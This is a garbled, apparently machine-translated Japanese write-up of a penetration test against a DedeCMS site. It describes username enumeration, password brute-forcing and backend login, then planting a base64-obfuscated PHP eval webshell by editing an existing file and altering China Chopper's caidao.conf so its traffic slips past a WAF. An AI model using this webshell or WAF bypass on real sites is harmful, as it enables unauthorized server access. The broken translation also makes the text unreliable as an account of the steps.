一度覚えておいてください織り夢CMS侵入テスト

一度覚えておいてください織り夢CMS侵入テスト

 

0x01の序文

このテストのプロセス全体:ユーザー名の列挙は - 暴力的な休憩をターゲットに - バックグラウンドでの記号 - 背景編集のPHPファイルgetshell。

0x02のプロセス

1、ログインユーザ名の列挙機能モジュールの欠陥がある、ユーザー名を列挙するためにこの権限を使用します

 

図2に示すように、対応するパスワードのブルート力を列挙することにより、ユーザ名、認証コードなしで機能モジュールログ。背景(dedecmsのV57)ログイン

 

図3は、ピットに遭遇し始めました。ファイル管理アップロードファイルや新しい広告手法は、(一見WAF)getshellすることはできません。アクションは、接続がリセットされています。

 

4、直接、元のファイルを編集しようとすると、コードが書かれています。

(1)書き込みは、phpinfo();成功しました

 

実行されたとき(2)従来の書き込みワードが正常しかし、接続がリセットされ

(3)ワードbase64エンコーディング書き込み<PHPの@Eval(BASE64_DECODE($ _ POST [ '0nth3wayを']));?>、符号化されたデータが正常に後に行うことができます

5、ナイフは、以下の設定ファイルcaidao.confを変更するには、単語トロイの木馬を接続することができます。

<PHP_BASE> 
ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFtpZF0pKTs %% 3D&ID =%S
 </ PHP_BASE>

 

6、成功した単語に接続チョッパー。権限:IISユーザー

 

プロセスを参照してくださいwkds.exe名付け7は、気持ちが一番下に取得していない、保護ソフトウェアです。

8、次の日の寒さ。

(1)MA依然として、ナイフROMなどを用いることができます。()のphpinfoを実行することができます。(「whoamiは」)、システムを実行することができない、のphpinfo相関関数が無効になってああではないも参照してください。疑問符の顔?探している答え0.0

 

(2)背景には、ファイルを編集することができません

0x03のあとがき

このテストでは、心の中でこれを取得することです:

(1)トラフィックデータバイパスWAF、チョッパ構成変更コネクションをコードすることができます。

(2)カルペディエム

おすすめ

転載: www.cnblogs.com/0nth3way/p/11322541.html